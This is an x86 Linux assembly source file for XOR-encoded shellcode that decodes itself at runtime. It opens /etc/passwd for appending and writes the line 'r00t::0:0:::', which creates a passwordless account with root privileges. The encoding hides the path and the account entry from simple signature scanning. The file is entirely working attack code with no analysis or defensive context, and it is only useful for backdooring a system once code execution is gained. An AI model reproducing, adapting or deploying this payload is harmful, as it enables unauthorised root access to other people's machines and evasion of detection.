global _start

section .text

_start:

	xor ebx,ebx
	mul ebx
	jmp short call_decoder

decoder:
	pop esi
	mov ebx, esi

decode:
	xor byte [esi], 0xDE
	jz Poly
	inc esi
	jmp short decode

Poly:
	mov [ebx+11], edx
	mov cx, 02001Q
	mov al, 0x5
	int 0x80

	mov [ebx+27], edx
	lea ecx, [ebx+15]
	push byte 0xc
	pop edx
	mov ebx,eax
	xor eax,eax
	mov al,0x4
	int 0x80

	mov al,0x6
	int 0x80

	inc eax
	int 0x80

call_decoder:
	call decoder
	Shellcode: db 0xf1,0xbb,0xaa,0xbd,0xf1,0xae,0xbf,0xad,0xad,0xa9,0xba,0x86,0x86,0x86,0x86,0xac,0xee,0xee,0xaa,0xe4,0xe4,0xee,0xe4,0xee,0xe4,0xe4,0xe4,0xde

